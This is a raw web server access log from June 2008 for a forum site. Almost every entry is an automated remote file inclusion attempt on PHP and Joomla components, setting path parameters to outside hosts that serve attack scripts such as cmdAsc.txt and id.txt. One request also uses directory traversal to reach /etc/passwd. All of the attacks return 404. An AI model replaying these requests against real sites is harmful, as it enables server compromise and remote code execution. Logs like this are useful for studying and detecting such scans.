87.106.10.53 - - [01/Jun/2008:17:14:56 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.collegiateforum.org"
87.106.10.53 - - [01/Jun/2008:17:14:56 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.collegiateforum.org"
206.221.179.200 - - [01/Jun/2008:17:16:30 -0700] "GET //inc/formmail.inc.php?script_root=http://test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.collegiateforum.org"
206.221.179.200 - - [01/Jun/2008:17:16:30 -0700] "GET /logs//inc/formmail.inc.php?script_root=http://test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.collegiateforum.org"
80.32.194.164 - - [01/Jun/2008:17:17:00 -0700] "GET /logs/access_080107.log//tools/send_reminders.php?noSet=0&includedir=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
80.32.194.164 - - [01/Jun/2008:17:17:03 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
80.32.194.164 - - [01/Jun/2008:17:17:05 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
80.154.38.121 - - [01/Jun/2008:17:17:12 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://mfe-gay.de/cek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
80.154.38.121 - - [01/Jun/2008:17:17:12 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://mfe-gay.de/cek.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
193.192.58.2 - - [01/Jun/2008:17:17:43 -0700] "GET /logs/access_080324.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
193.192.58.2 - - [01/Jun/2008:17:17:43 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
193.192.58.2 - - [01/Jun/2008:17:17:43 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
206.221.179.200 - - [01/Jun/2008:17:17:47 -0700] "GET //extensions/moblog/moblog_lib.php?basedir=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.collegiateforum.org"
206.221.179.200 - - [01/Jun/2008:17:17:47 -0700] "GET /logs//extensions/moblog/moblog_lib.php?basedir=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.collegiateforum.org"
67.195.58.167 - - [01/Jun/2008:17:18:02 -0700] "GET /logs/access_080324.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.collegiateforum.org"
61.64.112.207 - - [01/Jun/2008:17:18:07 -0700] "GET /logs/access_080324.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://funn.as.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
61.64.112.207 - - [01/Jun/2008:17:18:09 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://funn.as.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
61.64.112.207 - - [01/Jun/2008:17:18:11 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://funn.as.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:17:21:14 -0700] "GET /logs/access_080324.log//modules/vwar/admin/admin.php?vwar_root=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:17:21:16 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:17:21:30 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
202.158.47.67 - - [01/Jun/2008:17:21:40 -0700] "GET /logs/access_080324.log/components/com_performs/performs.php?mosConfig_absolute_path=http://funn.as.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
202.158.47.67 - - [01/Jun/2008:17:21:41 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://funn.as.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
202.158.47.67 - - [01/Jun/2008:17:21:42 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://funn.as.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
72.47.213.57 - - [01/Jun/2008:17:22:36 -0700] "GET /logs/access_080310.log//load_lang.php?_SERWEB[serwebdir]=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
72.47.213.57 - - [01/Jun/2008:17:22:36 -0700] "GET /logs//load_lang.php?_SERWEB[serwebdir]=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
69.70.80.22 - - [01/Jun/2008:17:23:15 -0700] "GET /logs/access_080204.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
85.234.133.173 - - [01/Jun/2008:17:23:57 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://h1.ripway.com/zbunitin/scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.collegiateforum.org"
85.234.133.173 - - [01/Jun/2008:17:23:57 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://h1.ripway.com/zbunitin/scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.collegiateforum.org"
87.106.178.42 - - [01/Jun/2008:17:23:57 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://h1.ripway.com/zbunitin/scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.collegiateforum.org"
87.106.178.42 - - [01/Jun/2008:17:23:57 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://h1.ripway.com/zbunitin/scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.collegiateforum.org"
80.32.194.164 - - [01/Jun/2008:17:24:07 -0700] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
74.222.17.2 - - [01/Jun/2008:17:25:04 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.collegiateforum.org"
74.222.17.2 - - [01/Jun/2008:17:25:05 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.collegiateforum.org"
67.19.160.58 - - [01/Jun/2008:17:25:13 -0700] "GET /logs/access_080107.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:17:25:24 -0700] "GET /logs/access_080128.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:17:25:24 -0700] "GET /logs/access_080128.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
67.19.160.58 - - [01/Jun/2008:17:25:30 -0700] "GET /logs/access_080324.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.collegiateforum.org"
67.19.160.58 - - [01/Jun/2008:17:25:30 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.collegiateforum.org"
67.19.160.58 - - [01/Jun/2008:17:25:31 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:17:25:37 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:17:25:37 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:17:25:40 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:17:25:40 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:17:25:45 -0700] "GET /logs/access_080128.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:17:25:52 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:17:25:56 -0700] "GET /logs/access_080324.log//modules/vwar/admin/admin.php?vwar_root=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:17:26:02 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:17:26:02 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:17:26:06 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
80.67.24.32 - - [01/Jun/2008:17:26:17 -0700] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.insertcoinhere.de//language/lang_english/.../contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.collegiateforum.org"
80.67.24.32 - - [01/Jun/2008:17:26:17 -0700] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.insertcoinhere.de//language/lang_english/.../contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.collegiateforum.org"
74.6.22.182 - - [01/Jun/2008:17:26:26 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.collegiateforum.org"
74.6.22.182 - - [01/Jun/2008:17:26:26 -0700] "GET /staff/collegiateforum/executiveboard HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.collegiateforum.org"
74.222.17.2 - - [01/Jun/2008:17:26:29 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.collegiateforum.org"
74.222.17.2 - - [01/Jun/2008:17:26:31 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.collegiateforum.org"
88.191.63.70 - - [01/Jun/2008:17:26:36 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://h1.ripway.com/zbunitin/scan/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.collegiateforum.org"
88.191.63.70 - - [01/Jun/2008:17:26:36 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://h1.ripway.com/zbunitin/scan/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.collegiateforum.org"
67.19.160.58 - - [01/Jun/2008:17:28:08 -0700] "GET /logs/access.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.collegiateforum.org"
80.32.194.164 - - [01/Jun/2008:17:28:14 -0700] "GET /logs/access_080107.log//tools/send_reminders.php?noSet=0&includedir=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
80.32.194.164 - - [01/Jun/2008:17:28:15 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
80.32.194.164 - - [01/Jun/2008:17:28:15 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.togosite.com/jeux/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
61.58.40.55 - - [01/Jun/2008:17:28:24 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://h1.ripway.com/zbunitin/scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.collegiateforum.org"
61.58.40.55 - - [01/Jun/2008:17:28:24 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://h1.ripway.com/zbunitin/scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.collegiateforum.org"
82.77.11.177 - - [01/Jun/2008:17:29:36 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://h1.ripway.com/zbunitin/scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.collegiateforum.org"
82.77.11.177 - - [01/Jun/2008:17:29:36 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://h1.ripway.com/zbunitin/scan/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.collegiateforum.org"
70.88.226.121 - - [01/Jun/2008:17:29:49 -0700] "GET /logs/access.log//admin/index.php?o=http://www.stjohnsconover.com/modules/MambWeather/templates/default/icons/cloud.png/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:17:30:19 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
87.106.37.86 - - [01/Jun/2008:17:31:37 -0700] "GET /logs/access.log//include.recipients.group.subnav.php?cfg[path][contenido]=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.37.86 - - [01/Jun/2008:17:31:38 -0700] "GET //include.recipients.group.subnav.php?cfg[path][contenido]=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.106.37.86 - - [01/Jun/2008:17:31:38 -0700] "GET /logs//include.recipients.group.subnav.php?cfg[path][contenido]=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
83.175.248.213 - - [01/Jun/2008:17:32:06 -0700] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.myarquivos.net/cmdAsc.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
219.94.133.251 - - [01/Jun/2008:17:35:10 -0700] "GET /index.php?go=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
85.114.133.81 - - [01/Jun/2008:17:35:26 -0700] "GET /logs/access.log//admin/index.php?o=http://www.bapeda-jabar.go.id/UserFiles/Image/baru/splash.me.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
212.244.43.139 - - [01/Jun/2008:17:35:29 -0700] "GET /logs/access.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.collegiateforum.org"
212.244.43.139 - - [01/Jun/2008:17:35:30 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.collegiateforum.org"
212.244.43.139 - - [01/Jun/2008:17:35:30 -0700] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.collegiateforum.org"
74.200.201.194 - - [01/Jun/2008:17:36:05 -0700] "GET /logs/access.log/appserv/main.php?appserv_root=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "collegiateforum.org"
74.200.201.194 - - [01/Jun/2008:17:36:05 -0700] "GET /appserv/main.php?appserv_root=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "collegiateforum.org"
74.200.201.194 - - [01/Jun/2008:17:36:05 -0700] "GET /logs/appserv/main.php?appserv_root=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "collegiateforum.org"
212.244.43.139 - - [01/Jun/2008:17:36:10 -0700] "GET /logs/access_071224.log/bookmark4u/lostpasswd.php?env[include_prefix]=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.collegiateforum.org"
212.244.43.139 - - [01/Jun/2008:17:36:45 -0700] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.collegiateforum.org"
74.53.229.194 - - [01/Jun/2008:17:42:20 -0700] "GET //component/option,com_performs/Itemid,0/formid,1/components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
74.53.229.194 - - [01/Jun/2008:17:42:21 -0700] "GET /logs//component/option,com_performs/Itemid,0/formid,1/components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
69.27.110.65 - - [01/Jun/2008:17:42:23 -0700] "GET /logs/access_080107.log//config/dbutil.bck.php?confdir=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
69.27.110.65 - - [01/Jun/2008:17:42:23 -0700] "GET //config/dbutil.bck.php?confdir=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
69.27.110.65 - - [01/Jun/2008:17:42:23 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.bestpaket.ru/netcat//dump/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
70.84.106.68 - - [01/Jun/2008:17:42:28 -0700] "GET /logs/access_080107.log//config/dbutil.bck.php?confdir=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
70.84.106.68 - - [01/Jun/2008:17:42:28 -0700] "GET //config/dbutil.bck.php?confdir=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
70.84.106.68 - - [01/Jun/2008:17:42:28 -0700] "GET /logs/access_080107.log//config/dbutil.bck.php?confdir=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
70.84.106.68 - - [01/Jun/2008:17:42:28 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
70.84.106.68 - - [01/Jun/2008:17:42:28 -0700] "GET //config/dbutil.bck.php?confdir=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
70.84.106.68 - - [01/Jun/2008:17:42:28 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
70.87.13.42 - - [01/Jun/2008:17:42:46 -0700] "GET /logs/access_080107.log//config/dbutil.bck.php?confdir=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
70.87.13.42 - - [01/Jun/2008:17:42:46 -0700] "GET //config/dbutil.bck.php?confdir=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
70.87.13.42 - - [01/Jun/2008:17:42:46 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
212.193.226.112 - - [01/Jun/2008:17:43:16 -0700] "GET /logs/access_080107.log//tools/send_reminders.php?noSet=0&includedir=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
212.193.226.112 - - [01/Jun/2008:17:43:17 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
212.193.226.112 - - [01/Jun/2008:17:43:17 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
194.158.195.132 - - [01/Jun/2008:17:43:59 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.collegiateforum.org"
194.158.195.132 - - [01/Jun/2008:17:43:59 -0700] "GET //config/dbutil.bck.php?confdir=http://nardinet.fr/test/.../test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.collegiateforum.org"
65.55.213.10 - - [01/Jun/2008:17:44:30 -0700] "GET /logs/access_071203.log HTTP/1.0" 200 356805 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.collegiateforum.org"
65.55.213.10 - - [01/Jun/2008:17:44:31 -0700] "GET /logs/access_080107.log HTTP/1.0" 200 3572372 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.collegiateforum.org"
65.55.213.10 - - [01/Jun/2008:17:44:36 -0700] "GET /logs/access_080211.log HTTP/1.0" 200 6210438 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.collegiateforum.org"
65.55.213.10 - - [01/Jun/2008:17:44:39 -0700] "GET /logs/access_071217.log HTTP/1.0" 200 1829982 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.collegiateforum.org"
